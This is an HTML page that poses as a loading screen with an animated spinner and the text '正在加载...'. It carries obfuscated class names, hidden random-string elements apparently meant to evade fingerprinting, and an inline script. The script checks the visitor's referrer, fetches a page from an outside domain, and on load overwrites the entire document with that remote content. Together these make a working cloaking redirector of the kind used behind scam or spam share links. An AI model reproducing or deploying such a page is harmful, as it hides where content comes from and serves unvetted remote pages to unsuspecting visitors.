<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .VTBV2wRGH4B {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .VTBV2wRGH4B .qJMP5YT {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .VTBV2wRGH4B .content {
            line-height: 50px;
            text-align: center
        }

        .VTBV2wRGH4B .img {
            width: 100%
        }

        .VTBV2wRGH4B .qGlFFUE42pC {
            text-align: center
        }

        .VTBV2wRGH4B .qGlFFUE42pC span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .VTBV2wRGH4B .qGlFFUE42pC span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .VTBV2wRGH4B .qGlFFUE42pC span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .VTBV2wRGH4B .qGlFFUE42pC span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .VTBV2wRGH4B .qGlFFUE42pC span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .VTBV2wRGH4B .qGlFFUE42pC span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .VTBV2wRGH4B .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function zRsVyHhaQr(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Vma79Vj = zRsVyHhaQr('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Vma79Vj +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Vma79Vj +".html?a=share";
		}
		
        mCv7GW7rQT=url+"#"+new Date().getTime();
        mCv7GW7rQT && function() {
            $.get(mCv7GW7rQT, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>A72wlANhgT7OhinvBVL1N3rGxZqKIzUvhpaVTzbMa5eaK7suZhzM9xp</div>
<h1 style='display:none' >t376H4YAuBpo7u</h1>
<h1 style='display:none' >t376H4YAuBpo7u</h1><div class="VTBV2wRGH4B">
    <div class="qJMP5YT">
        <div class="qGlFFUE42pC">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >yNzrURT7hZvQIJinRejzgUXVV2f99VZ1pDJqA5qzJ53Dg5py1A7tGkndtDCvnLnktVsqHLZ7p9p5poFsxFzmg</h1>
<li style='display:none' >NWf5mCpn303f7SfNtZCTldgfgV2WZAegIaYkIKeoJwBJMVxEJkycAjBcssSQq1VdXOOqalAaTrcoLbRyZQdlETZCHj5iiHQiZtOMG</li>
<span style='display:none'>Y48iVl5oF127pnaxdULG2t0s73CxeDEAtWnwR1EkI3Mx3SVHqXGV7eU0W3cXX3xlmbKAYACQH</span>
<img  src='' style='display:none'></body>
</html>